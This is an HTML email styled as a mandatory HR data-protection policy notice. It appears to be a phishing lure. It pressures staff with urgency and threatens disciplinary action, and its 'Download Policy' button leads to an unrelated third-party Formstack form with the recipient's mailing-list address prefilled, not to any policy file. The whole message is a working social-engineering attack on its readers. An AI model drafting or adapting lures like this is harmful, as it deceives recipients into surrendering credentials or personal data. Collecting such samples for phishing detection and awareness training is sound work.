<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Data Protection Policy</title>
    <style>
        .download-button {
            background-color: #007bff;
            color: #fff;
            border: none;
            padding: 10px 20px;
            text-decoration: none;
            border-radius: 5px;
            font-weight: bold;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <p>We are implementing a new data protection policy to enhance our security measures. It is mandatory for all staff members to download and understand the policy immediately.</p>
    <p><strong>Action Required:</strong></p>
    <ul>
        <li>Download Policy: Find the link to the policy document below.</li>
        <li>Review: Familiarize yourself with the policy content.</li>
        <li>Certify Understanding: Complete and return the acknowledgment form to HR.</li>
    </ul>
    <p>Non-compliance may result in disciplinary action. Thank you for your prompt cooperation.</p>
    <p>Best regards</p>
    <a style="background-color: #007bff;
            color: #fff;
            border: none;
            padding: 10px 20px;
            text-decoration: none;
            border-radius: 5px;
            font-weight: bold;
            cursor: pointer" href="https://worldssurfer.formstack.com/forms/employee_acknowledgement?email=pkg-nginx-maintainers@alioth-lists.debian.net" class="download-button" download="">Download Policy</a>
</body>
</html>